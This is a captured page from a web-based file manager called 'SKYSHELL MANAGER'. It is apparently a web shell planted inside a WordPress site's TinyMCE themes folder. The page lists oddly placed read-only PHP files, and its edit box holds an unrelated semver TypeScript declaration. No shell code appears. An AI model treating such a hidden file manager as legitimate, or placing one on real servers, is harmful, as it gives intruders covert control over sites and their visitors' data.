📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: inc.d.ts
import SemVer = require('../classes/semver'); import semver = require('../index'); declare namespace inc { /** Base number to be used for the prerelease identifier */ type IdentifierBase = '0' | '1'; } /** * Return the version incremented by the release type (major, minor, patch, or prerelease), or null if it's not valid. */ declare function inc( version: string | SemVer, release: semver.ReleaseType, optionsOrLoose?: boolean | semver.Options, identifier?: string ): string | null; declare function inc( version: string | SemVer, release: semver.ReleaseType, identifier?: string, identifierBase?: inc.IdentifierBase | false, ): string | null; export = inc;
Save